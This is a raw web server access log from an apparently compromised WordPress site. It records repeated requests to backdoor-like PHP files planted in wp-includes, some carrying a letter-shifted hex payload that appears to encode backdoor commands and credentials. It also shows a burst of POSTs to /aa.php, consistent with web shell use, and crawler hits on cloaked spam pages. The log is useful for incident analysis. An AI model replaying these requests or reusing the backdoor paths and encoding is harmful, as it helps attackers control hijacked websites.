66.249.77.167 - - [27/Oct/2025:13:02:16 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php??market=61209847 HTTP/1.1" 200 22345 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:12:57:27 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538373834372p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343234372q3834313762643738613836346634666561326466353766326439363031303165222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
69.197.149.50 - - [27/Oct/2025:13:02:42 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.54.126.113 - - [27/Oct/2025:12:57:47 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538373836372p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343236372q3164303738353737383539383162386436623933666431663363306539323433222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:12:58:08 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538373838382p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343238382q6231376466643530646161346534666165616438323066386365636131326366222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:03:13 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php?market/63237211 HTTP/1.1" 200 24624 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:12:58:28 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538373930382p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343330382q3761646164396132613164336539666632393561313136366537386363326262222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:12:58:48 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538373932382p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343332382q3264346463376339396437626134356162326661343864363766373038313936222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.168 - - [27/Oct/2025:13:03:52 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php??market=56232796 HTTP/1.1" 200 24584 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.77.167 - - [27/Oct/2025:13:03:57 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php??market=63621978 HTTP/1.1" 200 24317 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:12:59:09 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538373934392p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343334392q6232363964663136333062386563373632626165336361393132393138393130222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
69.197.149.50 - - [27/Oct/2025:13:04:11 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.54.126.113 - - [27/Oct/2025:12:59:30 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538373937302p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343337302q6532616563643266613736653735623531343638393564653162353461303433222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:04:31 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=62698738 HTTP/1.1" 200 20299 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:12:59:51 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538373939312p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343339312q6138386338363339613666643930663834653261613933366565326433326263222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:00:11 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383031312p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343431312q6135616564336339633038613338336332343264303666373363306163393338222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.160 - - [27/Oct/2025:13:05:10 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php??market=66868388 HTTP/1.1" 200 23864 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:00:32 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383033322p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343433322q3733383730356564643161643531386364313431393932653634633164633530222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.168 - - [27/Oct/2025:13:05:38 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php??market=55749642 HTTP/1.1" 200 25055 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [27/Oct/2025:13:05:42 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.77.167 - - [27/Oct/2025:13:05:49 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=57196866 HTTP/1.1" 200 24032 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:00:52 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383035322p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343435322q6234323338386239633364396462336562313937323830343132396535613335222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.160 - - [27/Oct/2025:13:06:09 -0400] "GET /deploy114007801.html HTTP/1.1" 200 23846 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.54.126.113 - - [27/Oct/2025:13:01:12 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383037322p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343437322q3037383434633832633763393336343434626138326665636335303564616639222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.168 - - [27/Oct/2025:13:06:28 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=67716311 HTTP/1.1" 200 24271 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:01:33 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383039332p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343439332q6132303366343466343336343639396539316430343161396239393037306534222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:01:53 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383131332p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343531332q6236373065636237323634643437373361613333323037336262663537303538222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:07:07 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=58581841 HTTP/1.1" 200 25009 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:02:14 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383133342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343533342q3034613765623736633239636133616134636639303033346135663339373932222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
69.197.149.50 - - [27/Oct/2025:13:07:14 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.77.168 - - [27/Oct/2025:13:07:20 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=57028551 HTTP/1.1" 200 24387 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.77.167 - - [27/Oct/2025:13:07:24 -0400] "GET /learning189027478.html HTTP/1.1" 200 24106 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.54.126.113 - - [27/Oct/2025:13:02:34 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383135342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343535342q6530396135343631363665346361316132366536636139313932663134633332222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:34 -0400] "GET /aa.php HTTP/1.1" 200 86020 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:37 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:38 -0400] "POST /aa.php HTTP/1.1" 200 93908 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:40 -0400] "POST /aa.php HTTP/1.1" 200 93908 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:43 -0400] "POST /aa.php HTTP/1.1" 200 86019 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:45 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:46 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:46 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:46 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:46 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:47 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
66.249.77.168 - - [27/Oct/2025:13:07:47 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=64575759 HTTP/1.1" 200 19833 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
180.248.28.215 - - [27/Oct/2025:13:07:47 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:47 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:47 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:48 -0400] "POST /aa.php HTTP/1.1" 200 86036 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:49 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:50 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:50 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:50 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:51 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:51 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:51 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:51 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:52 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:52 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:52 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:02:54 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383137342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343537342q6263633230626165346461343133376636316439643136626637313535396565222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:53 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:55 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:07:58 -0400] "POST /aa.php HTTP/1.1" 200 86027 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:01 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:01 -0400] "POST /aa.php HTTP/1.1" 200 86020 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:05 -0400] "POST /aa.php HTTP/1.1" 200 86020 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:08 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:11 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:11 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:11 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:12 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:03:15 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383139352p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343539352q3961646232633934316463616565613439326262383834623634653764373566222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:14 -0400] "POST /aa.php HTTP/1.1" 500 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:16 -0400] "POST /aa.php HTTP/1.1" 200 86020 "-" "-"
216.244.66.239 - - [27/Oct/2025:13:08:21 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
180.248.28.215 - - [27/Oct/2025:13:08:18 -0400] "POST /aa.php HTTP/1.1" 200 86032 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:22 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:08:26 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=66070361 HTTP/1.1" 200 20282 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
180.248.28.215 - - [27/Oct/2025:13:08:26 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:27 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:29 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
